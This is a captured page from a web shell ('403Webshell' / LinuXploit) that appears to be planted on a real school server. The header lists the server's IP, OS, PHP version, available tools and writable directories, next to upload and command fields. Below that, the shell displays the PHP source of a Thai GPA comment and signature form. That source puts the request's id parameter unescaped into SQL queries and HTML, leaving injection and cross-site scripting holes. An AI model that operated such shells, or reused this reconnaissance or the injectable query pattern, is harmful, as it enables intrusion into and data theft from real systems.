403Webshell
Server IP : 61.19.30.66  /  Your IP : 216.73.216.59
Web Server : Apache/2.2.22 (Ubuntu)
System : Linux klw 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64
User : www-data ( 33)
PHP Version : 5.3.10-1ubuntu3.48
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/gpa/comment1/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/gpa/comment1//index.php
<?
include('head.php');  //ไฟล์เชื่อมต่อกับ database ที่เราได้สร้างไว้ก่อนหน้าน
include('confiteacher.inc.php');  //ไฟล์เชื่อมต่อกับ database ที่เราได้สร้างไว้ก่อนหน้าน
include('config.php');  //ไฟล์เชื่อมต่อกับ database ที่เราได้สร้างไว้ก่อนหน้าน
$teach=$objResult["teachcode"];
$name=$objResult["name"];
$sing=$objResult["sing"];
?>
<?				$crsql="SELECT upteach FROM `uploadfile` where fileID='$_GET[id]'";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$namet=$dcrd[0];


                $crsql="SELECT name FROM `teacher` where teachcode='$namet'";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$nametfull=$dcrd[0];


				$crsql="SELECT comment1 FROM `uploadfile` where fileID='$_GET[id]'";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$namecomment1=$dcrd[0];


				$crsql="SELECT fileupload FROM `uploadfile` where fileID='$_GET[id]'";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$fileupload=$dcrd[0];



?>
<!DOCTYPE html>
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>ทำแบบฟอร์มที่บันทึกลายเซ็นได้ (Signature Pad)</title>
<STYLE type=text/css>
  A:link { color: #0000cc; text-decoration:none}
  A:visited {color: #0000cc; text-decoration: none}
  A:hover {color: red; text-decoration: none}
 </STYLE>
<style type="text/css">
<!--
small { font-family: Arial, Helvetica, sans-serif; font-size: 9pt; } 
input, textarea,select { font-family: Arial, Helvetica, sans-serif; font-size: 11pt; } 
b { font-family: Arial, Helvetica, sans-serif; font-size: 11pt; } 
big { font-family: Arial, Helvetica, sans-serif; font-size: 14pt; } 
strong { font-family: Arial, Helvetica, sans-serif; font-size: 11pt; font-weight : extra-bold; } 
font, td { font-family: Arial, Helvetica, sans-serif; font-size: 11pt; } 
BODY { font-size: 11pt; font-family: Arial, Helvetica, sans-serif; } 
-->
</style>


<link href="./css/jquery.signaturepad.css" rel="stylesheet">
<script src="./js/jquery_1_10_2.min.js"></script>
<script src="./js/numeric-1.2.6.min.js"></script> 
<script src="./js/bezier.js"></script>
<script src="./js/jquery.signaturepad.js"></script> 

<script type='text/javascript' src="./js/html2canvas.js"></script>
<script src="./js/json2.min.js"></script>

<style type="text/css">
#signArea{
	width:304px;
	margin: 0px auto;
}
.sign-container {
	width: 60%;
	margin: auto;
}
.sign-preview {
	width: 150px;
	height: 50px;
	border: solid 1px #CFCFCF;
	margin: 10px 5px;
}
</style>

</head>

<body>
<tr> 
          <td><div align="right"><a href="/gpa/main.php">index</a> 
              | <a href="/gpa/logout.php/">out</a></font></div></td>
        </tr>

<div align="center">
comment<br><br>
<table border="1" cellpadding="5" cellspacing="2" style="border-collapse: collapse" bordercolor="#111111" width="450">
  <tr>
    <td width="120"><div align="left"><b>ID :</b></div></td>
	<td width="330"><div align="left"><input type="text" name="fullname" id="fullname" size="30" readonly='readonly' value="<? echo $_GET[id]; ?>"> teach<? echo $namet; ?></div></td>
  </tr>
  <tr>
    <td valign="top"><div align="left"><b>text :</b></div></td>
	<td><div align="left">
	
	<div id="signArea" >
		<small>text [ <a href="#" id="btnClearSign">del</a> ]</small> 
		
		<div class="sig sigWrapper" style="height:auto;">
			<div class="typed"></div>
			<canvas class="sign-pad" id="sign-pad" width="300" height="200"></canvas>
		</div>
	</div>
	
	</div></td>
  </tr>
  <tr>
    <td colspan="2"><div align="center"><input name="submit_bt" id="submit_bt" value="SAVE" type="button"></div></td>
  </tr>
</table>  

<br><br>
<b><u> comment </u></b>
<br><br>
		
		<div class="sign-container">
		<?php
		$image_list = glob("./doc_signs/$namecomment1.png");
		foreach($image_list as $image){
			//echo $image;
		?>
		<img src="<?php echo $image; ?>" class="sign-preview" />
		<?php
		
		}
		?>
		</div>
		
		
		<script>
			$(document).ready(function() {
				$('#signArea').signaturePad({drawOnly:true, drawBezierCurves:true, lineTop:90});
			});
			
			$("#btnClearSign").click(function(e){
				$('#signArea').signaturePad().clearCanvas();
			});
			
			$("#submit_bt").click(function(e){
				
				// Validate Field ที่กรอกเข้ามา
				fullname_fld = document.getElementById('fullname');
				
				if (fullname_fld.value == "") {
					alert( "โปรดกรอก ชื่อ - นามสกุล ด้วย" );
					fullname_fld.focus();
					return false ;
				}
				
				if (isCanvasBlank(document.getElementById('sign-pad'))) {
					alert('โปรดเซ็น ลายเซ็น ด้วย');
					return false ;
				}
				
				// บันทึกลงฐานข้อมูล
				html2canvas([document.getElementById('sign-pad')], {
					onrendered: function (canvas) {
						var canvas_img_data = canvas.toDataURL('image/png');
						var img_data = canvas_img_data.replace(/^data:image\/(png|jpg);base64,/, "");
						
						//ajax call to save image inside folder
						$.ajax({
							url: 'save_sign.php',
							data: { img_data:img_data , fullname:fullname_fld.value },
							type: 'post',
							dataType: 'json',
							success: function (response) {
							   
							   //alert(response.id); // ใช้ response.ชื่อ Key ในการดึงข้อมูลที่ส่งกลับมา
							   //window.location.href = response.file_name;
							   
							   alert("บันทึกข้อมูลเรียบร้อยแล้ว !!\n\nข้อความส่งกลับ : " + response.id);
							 							   
							   window.location.reload();
							   
							}
						});
					}
				});
			});
			
			function isCanvasBlank(canvas) {
				
				txt_tmp = canvas.toDataURL();
								
				//console.log(canvas.toDataURL());
				
				if((txt_tmp.length == 1162) | (txt_tmp.length == 1178) | (txt_tmp.length == 586) | (txt_tmp.length == 594) | (txt_tmp.length == 642) | (txt_tmp.length == 654))
					return true;
				else
					return false;
				
			}
		</script> 


</div>

<br>

<center>
	<hr width="90%"><br>
	by : <a href="http://gpa.klws.ac.th" target="_blank">GPA klw</a>
	
	<br><br><hr width="90%">
</center>

<iframe src="http://61.19.30.66/gpa/upload/fileupload/<? echo  $fileupload?> " width="100%" height="500px">
</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit